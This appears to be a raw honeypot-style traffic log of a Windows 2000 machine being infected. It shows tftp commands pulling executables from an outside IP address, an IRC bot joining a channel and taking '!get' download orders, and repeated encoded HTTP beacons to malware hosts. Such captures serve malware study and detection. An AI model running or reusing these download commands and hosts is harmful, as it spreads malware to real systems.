Client: dir dllcache\\\\tftpd.exe; Client: tftp -i 175.113.174.59 get svchost.exe wins\\\\SVCHOST.EXE


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	tftp -i 175.113.174.59 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	Transfer successful: 29184 bytes in 9 seconds, 3242 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	tftp -i 175.113.174.59 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	Transfer successful: 19968 bytes in 6 seconds, 3328 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK nreavggnUSER b020500 . . :- 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	:u. PRIVMSG nreavggn :!get http:/sb.letmedo.net:2012/p/out/kp.exe:u. PRIVMSG nreavggn :!get http:/netnetnet1.com/sd7.txt 
VICTIM:  	GET /p/out/kp.exe HTTP/1.0User-Agent: DownloadHost: sb.letmedo.net:2012Pragma: no-cache 
ATTACKER:	GET /sd7.txt HTTP/1.0User-Agent: DownloadHost: netnetnet1.comPragma: no-cache 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2F69F5DCEECA825FF3F6CDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.5671961 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: sedsed1.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2F69F5DCEECA825FF3F6CDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=3.414333E-03 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /temp/3431.exe?t=0.9155237 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: netnetnet1.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=0D130EEA51C124F7869ABE942F6A06C3B378053F3211AF31DEBA5123248D97BA3248759E9CF3C4A52A4D4CD31705908949B1A0164A3BAE8B0C6C4AE0B7CA68191C519A3D7FA72AB5C9F3F9837799449BB443CCF17D03ECEACB699CF10DE782FB7B2A74650F2F18B720938B0CF3F332A8C136230C0047CAEDFAA3B1DEE95F982639303E9AA29490502D180D5871B2AB2F&t=0.3868982 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: sedsed1.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /hn.gif?t=0.7115442 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: hn.yigeyuming.com:82Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=829C1FFB08987DD943AA7851763E14D71E843E56554A1DDA4B292463A3047558BEC394792E127D20E78C9708EFE61EF69C56F6119A3B0A22546C9EE37309443795DA493D63B7E27DAF955B214BA511CEAB5C0A3798E65B5D7FDDC2AF18F2255C83D2C8D90C2C7CD3299A1D9A7E7E118BE81FA58AD59281A6792088E7A610DA644643D97CCDE25B9F20167625BD797CF8&t=0.6846277 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=5648A246E272AB78EAF6CBE1FBBEE520E62D162CA380950B2044CEBC862F0429C7BD38D36B043051F790D14E667429308A72D86E4F3EBB9E32520CA6720F4D3CC489B71088500996D7EDEB91E6083EE18E790C31F58B0204B2108EE3E2081B620455001197B7208FD1624ADCE910DB53C633336D1340F2C00612265363C1C63C7A6A359133019C5F68525E0C1BDAFA7B4897&t=0.8268396 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: sedsed1.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=445A8F6BA737A60245AC48618EC6FD3E5EC4DAB27A658E49E587DA9DFF58B69B90EDB35E28145B067D169B04A6AF7F9775BFC6212E8F153D7149D9A41C6613605D12A1D55C88C8571D27057F8A6470AFCE393904582606004EEC355831DB5920FEAF66771B3B62CDC675A335E21BD55D5AAF623C7320F6C4BCA82C598624AE5402124EE880B3DE165A60D2879750F3734B90&t=0.4558679 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /gggg_r.jpg?t=0.1450006 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 61.147.99.179:81Connection: Keep-AlivePragma: no-cache 
VICTIM:  	POST /+11234.html HTTP/1.1UA-CPU: x86Accept-Language: en-usCB2: 1Accept-Encoding: gzip, deflateUser-Agent: MozillaHost: 112.168.240.193 
VICTIM:  	HTTP/1.0 200 OKYES 
ATTACKER:	GET /temp/int.exe?t=0.4587976 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: netnetnet1.comConnection: Keep-AlivePragma: no-cache 
VICTIM:  	POST /+11234.html HTTP/1.1Accept: */*Accept-Language: en-usCB2: 1Accept-Encoding: gzip, deflateUser-Agent: MozillaHost: 190.29.216.48 
ATTACKER:	PING :i. 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :i. 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu